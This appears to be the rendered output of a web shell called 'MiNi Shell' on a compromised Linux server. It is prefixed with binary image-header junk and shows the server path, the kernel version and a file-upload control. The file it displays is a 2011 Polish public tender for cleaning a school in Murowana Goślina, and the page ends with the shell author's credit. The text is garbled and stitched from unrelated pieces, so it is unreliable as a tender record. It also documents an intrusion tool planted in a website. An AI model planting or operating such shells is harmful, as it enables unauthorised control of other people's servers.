JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20111125/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20111125/396812-N-2011.html

<p class="kh_header"><b>Murowana Goślina: usługa kompleksowego utrzymania czystości w budynku Gimnazjum nr1 im. Hipolita Cegielskiego w Murowanej Goślinie</b><br>
<b>Numer ogłoszenia: 396812 - 2011; data zamieszczenia: 25.11.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gimnazjum Nr 1 im. Hipolita Cegielskiego w Murowanej Goślinie , ul. Mściszewska 10, 62-095 Murowana Goślina, woj. wielkopolskie, tel. 0-61 811 27 79, faks 0-61 811 27 79.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> usługa kompleksowego utrzymania czystości w budynku Gimnazjum nr1 im. Hipolita Cegielskiego w Murowanej Goślinie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest świadczenie usługi kompleksowego utrzymania czystości w roku 2012 z wyłączeniem lipca 2012 r. w budynku Gimnazjum nr1 im. Hipolita Cegielskiego w Murowanej Goślinie przy ul. Mściszewskiej 10. 

Wykonawca zobowiązany jest do utrzymania własnym sprzętem i środkami czystości w należnym stanie sanitarno - porządkowym powierzchni poziomych i pionowych z uwzględnieniem, iż w pomieszczeniach pokoju nauczycielskiego, wicedyrektora, pedagoga, psychologa, czytelni, biblioteki, salach, zapleczach występuje parkiet, na korytarzach występują płytki lastriko, które należy czyścić maszynowo. W pomieszczeniach administracji, trzech salach, gabinetach, pokoju wystaw, świetlico-jadalni występuje wykładzina PCV. Na schodach zewnętrznych występują płytki. W łazienkach występują płytki ścienne i podłogowe. Dodatkowo w trzech pomieszczeniach znajduje się wykładzina dywanowa. Zamawiający zapewnia mydło, papier toaletowy oraz ręczniki papierowe do łazienek.
Wykonawca zobowiązany jest do odśnieżania własnym sprzętem.

Dyżur codzienny w godzinach 8.10 do 14.00 (jednej osoby) w celu bieżącego utrzymania 
czystości w szkole.
Codzienne sprzątanie 3426 m2 powierzchni:
a) pomieszczenia:
-zamiatanie sal lekcyjnych, zapleczy, pomieszczeń: pokoju nauczycielskiego, wicedyrektora, biblioteki, czytelni, psychologa (powierzchni drewnianych),
-zamiatanie i mycie sal lekcyjnych (wykładzina PCV),
-odkurzanie i mycie listew ściennych, drzwi i tablic,
-mycie krzeseł, czyszczenie blatów ławek, biurek, ścian w salach,
-odkurzanie szaf, szafek, gazetek ściennych, 
-odkurzanie i mycie parapetów,
-mycie tablic, umywalek,
-opróżnianie i mycie koszy na śmieci, wymiana worków foliowych na śmieci w miarę potrzeb,
-czyszczenie grzejników, wyłączników prądu, lamp,
b) pomieszczenia biurowe:
-zamiatanie i mycie: pomieszczeń biurowych, pedagoga, świetlico-jadalni, 
-odkurzanie biurek, urządzeń biurowych, telefonów, komputerów, kserokopiarek, 
-odkurzanie szaf, gazetek ściennych,
-odkurzanie i mycie listew ściennych, drzwi i tablic,
-odkurzanie i mycie parapetów,
-opróżnianie i mycie koszy na śmieci, wymiana worków foliowych na śmieci w miarę potrzeb,
-czyszczenie grzejników, wyłączników prądu, lamp,
c) toalety i WC:
-mycie i dezynfekcja podłóg,
-mycie glazury, luster,
-mycie i dezynfekcja urządzeń sanitarnych i armatury,
-opróżnianie i mycie koszy na śmieci, wymiana worków foliowych na śmieci w miarę potrzeb,
-odkurzanie i mycie parapetów, drzwi,
-czyszczenie grzejników, wyłączników prądu, lamp,
d) pomieszczenia ogólne (korytarze, ciągi komunikacyjne, szatnie):
-zamiatanie, mycie maszynowe ciągów komunikacyjnych (korytarzy),
-zamiatanie, mycie schodów wewnętrznych, schodów zewnętrznych wejściowych, do szkoły i na boisko i na parking,
-zamiatanie i mycie szatni: podłogi, ścian, szafek, krat, krzeseł,
-opróżnianie i mycie koszy na śmieci, wymiana worków foliowych na śmieci w miarę potrzeb,
-czyszczenie grzejników, wyłączników prądu, lamp, zegarów i odbojnic,
-mycie ścian, sufitów na korytarzach,
-mycie krat metalowych i poręczy,
e) aula: zamiatanie - odkurzanie auli,
f) zbieranie śmieci z boiska szkolnego, z terenów zielonych wokół szkoły, z parkingu i przyległych chodników, z schodów prowadzących od szkoły na ulicę Mściszewską i z schodów od przedszkola na ulicę Mściszewską.
Czynności świadczone raz w tygodniu:
a) pomieszczenia:
-odkurzanie wszystkich powierzchni dywanowych i wyściełanych krzeseł;
-zamiatanie i mycie gabinetu pielęgniarki i stomatologa,
-czyszczenie powierzchni szklanych (szklane drzwi),
-doczyszczanie umywalek w salach lekcyjnych,
-podlewanie kwiatów na terenie szkoły,
-mycie ścian w salach lekcyjnych,
b) toalety WC:
-doczyszczanie umywalek,
-usuwanie odpadów wapiennych, moczowych z misek sedesowych i pisuarów
c) aula:
-mycie auli (podłoga lakierowana) środkami Clean - środek czyszczący do podłóg (lub równoważnymi - nie gorszymi) polegające na równomiernym rozprowadzeniu środków konserwujących po powierzchni., 
-mycie ścian po imprezach szkolnych;
Czynności okresowe:
-mycie trudnodostępnych części mebli - 1 raz w miesiącu,
-oczyszczanie płytek podłogowych i ściennych w toaletach - 1 raz w miesiącu,
-polerowanie powierzchni korytarzy - 1 raz w miesiącu,
-mycie okien - 1 raz na jesień, 1 raz na wiosnę o łącznej powierzchni 1526,25m2. Mycie otworów okiennych (szyb i ram okiennych wewnątrz i zewnątrz) wraz z parapetami, zgodnie z techniką mycia dostosowaną do rodzaju okien;
-mycie luksferów o łącznej powierzchni 26 m2. Mycie okien i luksferów w terminach uzgodnionych z Zamawiającym.
Okna w budynku gimnazjum dostępne są od wewnątrz. Jednak jest kilka, które należy umyć tylko od zewnątrz. Nie ma możliwości umycia ich z wysięgnika, jest tylko możliwość umycia przy użyciu drabiny. Ich powierzchnia wynosi 152,80 m2.
-Konserwacja podłóg drewnianych środkami Soja Wax Care (lub równoważnymi - nie gorszymi) polegająca na równomiernym rozprowadzeniu środków konserwujących powierzchni 1 raz na dwa miesiące;
-konserwacja auli środkami Finish Care (lub równoważnymi - nie gorszymi) polegająca na równomiernym rozprowadzeniu środków konserwujących po powierzchni - 1 raz na dwa miesiące.
-konserwacja podłóg drewnianych środkami Soja Oil Care (olejowosk do konserwacji) lub równoważnymi (nie gorszymi) polegająca na równomiernym rozprowadzeniu środków konserwujących po powierzchni - 1 raz na kwartał.
-konserwacja podłóg wyłożonych wykładziną PCV odpowiednim środkiem - 1 raz na kwartał.
-czyszczenie verticali i rolet (2 razy w roku).
Odśnieżanie codzienne w okresie opadów śniegu.
-podest i schody prowadzące od szkoły do ul. Mściszewskiej,
-podest i schody prowadzące od przedszkola do ul. Mściszewskiej,
-chodniki - przy auli, przy parkingu, od schodów do pętli,
-parking  - wjazd od ulicy Starczanowskiej (pas dla pieszych),
-każde odśnieżone miejsce musi byś posypane piaskiem (zapewnienie piasku po stronie Zamawiającego).

Usługa będzie świadczona od poniedziałku do piątku w godzinach od 14.30 do 20.30, w sytuacjach szczególnych (konkursy, turnieje sportowe, imprezy szkolne, środowiskowe i gminne itp.) w soboty i niedziele, po uprzednim powiadomieniu Wykonawcy przez Zamawiającego ( z uwagi na specyfikę pracy szkoły średnio 3 razy w miesiącu ok. 500m2), w dni zebrań z rodzicami - sprzątanie sal lekcyjnych i korytarzy przed i po zebraniach.
W dni kiedy na terenie szkoły nie ma uczniów i nie wykonywane jest gruntowne sprzątanie (konserwacje, mycie okien) dyżur sprzątający pełni jedna osoba.
Odśnieżanie musi nastąpić w godzinach wczesnorannych (pomiędzy 6.00 a 7.30) i południowych pomiędzy 12.30 a 14.00.

Papier toaletowy, ręczniki papierowe i mydło zapewnia Zamawiający.
Dodatkowe wymogi zawarte w cenie:
-przeszkolony personel w zakresie wykonywania usługi,
-odpowiednia ilość pracowników, zapewniających należyte wykonanie umowy,
-środki czyszczące, środki myjące, dezynfekujące, sprzęt niezbędny do wykonania  przedmiotowej usługi,
-zastosowane środki czystości muszą być biodegradowalne,
-odzież roboczą i ochronną dla pracowników wykonujących przedmiot zamówienia, zapewnia Wykonawca na swój własny koszt.

Codzienne kodowanie i zamykanie szkoły po zakończeniu sprzątania.

Powierzchnia przeznaczona do czyszczenia 3 426m2, w tym:
podłogi drewniane - 946,42m2:
płytki - 1541,97m2:
podłogi drewniane lakierowane - 341,00m2 (aula)
wykładzina PCV - 419,23m2
schody zewnętrzne - 177,15m2
sanitariaty: umywalki 56 szt., pisuary 16 szt., ubikacje 29szt.
Łączna powierzchnia korytarzy wynosi 983 m2. 
Łączna powierzchnia do odśnieżania: 1 100 m2.

Obowiązki wykonawcy po wykonaniu usług:
Zapisanie w Zeszycie Napraw w pokoju nauczycielskim uwag o zauważonych usterkach w sprzęcie i wyposażeniu szkoły.

Oferta musi obejmować całość zamówienia zgodnie z wymogami Zamawiającego. Zamawiający nie dopuszcza składania ofert częściowych oraz wariantowych. Zamawiający nie przewiduje zamówień uzupełniających.
Zamawiający dopuszcza możliwość powierzenia realizacji zadania podwykonawcom w pełnym zakresie.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 90.91.93.00-5.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie przewiduje wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający dokona oceny spełnienia tego warunku stosując ocenę zerojedynkową spełnia/nie spełnia. Ocena spełniania ww. warunku dokonana zostanie w oparciu o załączone przez Wykonawcę do oferty oświadczenie Wykonawcy o spełnianiu warunków określonych w art. 22 ust. 1 Ustawy Prawo zamówień publicznych</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający dokona oceny spełnienia tego warunku stosując ocenę zerojedynkową spełnia/nie spełnia. Ocena spełniania ww. warunku dokonana zostanie w oparciu o załączone przez Wykonawcę do oferty oświadczenie Wykonawcy o spełnianiu warunków określonych w art. 22 ust. 1 Ustawy Prawo zamówień publicznych oraz wykaz wykonanych usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, potwierdzający wykonanie co najmniej jednej usługi odpowiadającej swoją wartością i rodzajem (tj. o wartości nie mniejszej niż 50 000, 00 zł brutto każda) usłudze stanowiącej przedmiot niniejszego zamówienia, sporządzony na podstawie wzoru stanowiącego załącznik nr5 do SIWZ oraz dokumenty potwierdzające, że te usługi zostały wykonane należycie</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający dokona oceny spełnienia tego warunku stosując ocenę zerojedynkową spełnia/nie spełnia. Ocena spełniania ww. warunku dokonana zostanie w oparciu o załączone przez Wykonawcę do oferty oświadczenie Wykonawcy o spełnianiu warunków określonych w art. 22 ust. 1 Ustawy Prawo zamówień publicznych</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający dokona oceny spełnienia tego warunku stosując ocenę zerojedynkową spełnia/nie spełnia. Ocena spełniania ww. warunku dokonana zostanie w oparciu o załączone przez Wykonawcę do oferty oświadczenie Wykonawcy o spełnianiu warunków określonych w art. 22 ust. 1 Ustawy Prawo zamówień publicznych</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający dokona oceny spełnienia tego warunku stosując ocenę zerojedynkową spełnia/nie spełnia. Ocena spełniania ww. warunku dokonana zostanie w oparciu o załączone przez Wykonawcę do oferty oświadczenie Wykonawcy o spełnianiu warunków określonych w art. 22 ust. 1 Ustawy Prawo zamówień publicznych oraz zaakceptowanie 21-dniowego terminu płatności w formularzu oferty</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Dokument ustanawiający Pełnomocnika do reprezentowania w postępowaniu albo do reprezentowania w postępowaniu i zawarcia umowy, w przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia; 2. Stosowne pełnomocnictwo - w przypadku, gdy upoważnienie do podpisania oferty nie wynika bezpośrednio ze złożonego w ofercie odpisu z właściwego rejestru lub z zaświadczeniem o wpisie do ewidencji działalności gospodarczej</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość dokonania istotnych zmian w umowie pod następującymi warunkami: - konieczność wprowadzenia takich zmian wynika z okoliczności, których nie można było przewidzieć w chwili zawarcia umowy, lub zmiany te są korzystne dla Zamawiającego, - wystąpienia nieoczekiwanych trudności technicznych, których nie można było przewidzieć w chwili zawarcia umowy, - nieprzewidzianych okoliczności formalno-prawnych</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.bip2.murowana-goslina.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Gimnazjum nr 1 im. Hipolita Cegielskiego w Murowanej Goslinie ul. Mściszewska 10 Sekretariat 62-095 Murowana Goślina.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 12.12.2011 godzina 09:00, miejsce: Gimnazjum nr 1 im. Hipolita Cegielskiego w Murowanej Goslinie ul. Mściszewska 10 Sekretariat 62-095 Murowana Goślina.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zamawiający nie przewiduje: a) zawarcia umowy ramowej; b) rozliczeń w walucie obcej; c) przeprowadzenia aukcji elektronicznej; d) ustanowienia dynamicznego systemu zakupów.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com